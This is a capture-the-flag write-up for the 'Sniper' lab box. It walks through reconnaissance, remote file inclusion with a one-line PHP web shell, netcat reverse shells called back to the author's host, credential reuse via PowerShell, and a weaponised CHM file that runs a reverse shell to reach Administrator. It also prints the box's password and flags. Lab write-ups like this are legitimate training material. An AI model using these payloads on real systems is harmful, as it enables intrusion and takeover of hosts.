Sniper is the most challenging box I’ve done so far. Finding a way to access the machine as a random user was time consuming and quite easy afterwards. Yet there were several restrictions that kept me constantly looking for new ways. Nevertheless, it worked and you can read my writeup of Sniper here, a Medium box for 30 points.
[0x1] Reconnaissance & Enumeration
Start of the new box with an Nmap scan to get an idea of what you can get on this box.
nmap -sC -sV -oA sniper 10.10.10.151
[sudo] password for user:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 20:00 GMT
Nmap scan report for 10.10.10.151
Host is up (0.045s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Sniper Co.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-18T04:01:36
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.01 seconds
The scan shows that a Microsoft IIS Server responds to port 80. To have a look around here, I start a directory bruteforce with dirb.
dirb http://10.10.10.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 24 19:57:53 2020
URL_BASE: http://10.10.10.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.151/ ----
==> DIRECTORY: http://10.10.10.151/blog/
==> DIRECTORY: http://10.10.10.151/Blog/
==> DIRECTORY: http://10.10.10.151/css/
==> DIRECTORY: http://10.10.10.151/images/
==> DIRECTORY: http://10.10.10.151/Images/
+ http://10.10.10.151/index.php (CODE:200|SIZE:2635)
==> DIRECTORY: http://10.10.10.151/js/
==> DIRECTORY: http://10.10.10.151/user/
In the end not much wiser than manually clicking around on the website. There are three websites on display, the general one, a blog and a user login site that is under construction .
[0x2] Initial foothold
After some searching on the website, I come across an option to select a language on the blog page. The url is provided with a parameter that calls a file. This suggests to perform a Remote / Local File Injection (RFI / LFI) attack.
Many of the reverse php shells do not or hardly work on this box. Finally opted for the simplest variant in the form below online and saved as shellz.php . If I give a dir command to the url I get a neat directory listing. The Local File Injection (LFI) works.
shellz.php
<?php echo system($_GET["cmd"]); ?>
Prior to the Remote File Inclusion (RFI) attack, I open a Netcat listener on port 442.
nc -nvlp 442
listening on [any] 442 ...
The final url works after a long search. Using an SMB connection to a share on my machine, I invoke my PHP reverse shell and then from the same share run the 64-bit version of Netcat with my reverse shell IP address on port 442.
http://10.10.10.151/blog/?lang=\\10.10.14.233\sniper\shellz.php&cmd=\\10.10.14.233\sniper\nc64.exe 10.10.14.233 442 -e cmd
The listener picks up the reverse connection and I have a shell as user iusr
connect to [10.10.15.246] from (UNKNOWN) [10.10.10.151] 53423
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>whoami
whoami
nt authority\iusr
[0x2] Path to User flag
There is not much of interest in the blog map. In / User I see a db.php file in which a password is stored for the user dbuser. Perhaps this password can also be used by another user: 36mEAhz / B8xQ ~ 2VM
</body>
</html>
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
?></body>
</html>
Just check which users have a profile on the box to get an idea. what remains to be achieved. In this case only Chris.
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users
04/11/2019 06:04 AM <DIR> .
04/11/2019 06:04 AM <DIR> ..
04/09/2019 05:47 AM <DIR> Administrator
04/11/2019 06:04 AM <DIR> Chris
04/09/2019 05:47 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,882,988,544 bytes free
So there is only 1 extra user on this box. By means of a reverse shell on this box under the iusr account I try to jump to Chris’s account. For this I first start a new Netcat listener on port 446.
sudo nc -lnvp 446
listening on [any] 446 ...
Just search for a Powershell method for starting a new reverse shell from Powershell and with some adjustments it is done. On the SMB share, Netcat is still ready from the RFI, so I can immediately reuse it for a reverse shell over port 446.
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
Invoke-Command -ComputerName Sniper -Credential $cred -ScriptBlock { \\10.10.14.233\sniper\nc64.exe 10.10.14.233 446 -e cmd }
Got it! Netcat picks up the incoming connection and a whoami shows that the found password works for Chris.
connect to [10.10.15.246] from (UNKNOWN) [10.10.10.151] 53473
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Chris\Documents>whoami
whoami
sniper\chris
Since this is the only user on the machine, I immediately jump to the desktop to look for the user-flag.
C:\Users\Chris\Desktop>type user.txt
type user.txt
21f4d0f29fc4dd867500c1ad716cf56e
[0x4] Path to Root flag
With the user flag in the pocket, it is time to search further. In Chris’s Download folder there is a Windows Help file called instructions.chm . By means of kchmviewer I view the content and find another tip. Apparently it has something to do with an exploit around CHM files.
In the Docs folder I find a second hint. Drop it here when you’re done with it . Chances are that CHM files in this folder will be picked up and executed automatically.
C:\Docs>type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
I find an article on how to add code to a CHM file . Both manually and through a script called Nishang Out-CHM. In essence, it is no more than adding a bit of extra code and compiling the CHM file.
.SYNOPSIS
Nishang script useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
I’m adding some code to build a reverse shell based on Netcat on port 447 as a command prompt.
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c c:\docs\nc64.exe -nv 10.10.14.233 447 -e c:\Windows\system32\cmd.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
At the end of the file I call the function to compile it all and a file called doc.chm is neatly created.
Out-CHM -Payload "" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
To catch the incoming connection I start another Netcat listener on port 447.
netcat -lnvp 447
listening on [any] 447 ...
The shell is still running and I can use it to copy both 64-bit Netcat and the CHM file to the Docs folder as indicated in the CEO’s message.
copy \\10.10.14.233\sniper\upload\*.*
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Docs
02/24/2020 05:06 PM <DIR> .
02/24/2020 05:06 PM <DIR> ..
02/24/2020 08:49 AM 45,272 nc64.exe
04/11/2019 08:31 AM 285 note.txt
04/11/2019 08:17 AM 552,607 php for dummies-trial.pdf
02/24/2020 09:04 AM 13,380 Project.chm
4 File(s) 611,544 bytes
2 Dir(s) 17,935,466,496 bytes free
After copying the file to Project.chm I see it disappear in seconds and the listener picks up the incoming connection.
connect to [10.10.14.233] from (UNKNOWN) [10.10.10.151] 56190
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
On the reverse shell I am indeed connected as Administrator and the root key is where I expect it to be.
C:\Users\Administrator\Desktop>whoami
whoami
sniper\administrator
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6A2B-2640
Directory of C:\Users\Administrator\Desktop
10/01/2019 07:44 AM <DIR> .
10/01/2019 07:44 AM <DIR> ..
04/11/2019 07:13 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,935,482,880 bytes free
The last flag of the box. It was not always easy, but learned a lot. In practice it is unlikely that a .CHM file on a server will be processed automatically, but this is fine on a workstation. In any case, it was an original way to get root.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15
Add comment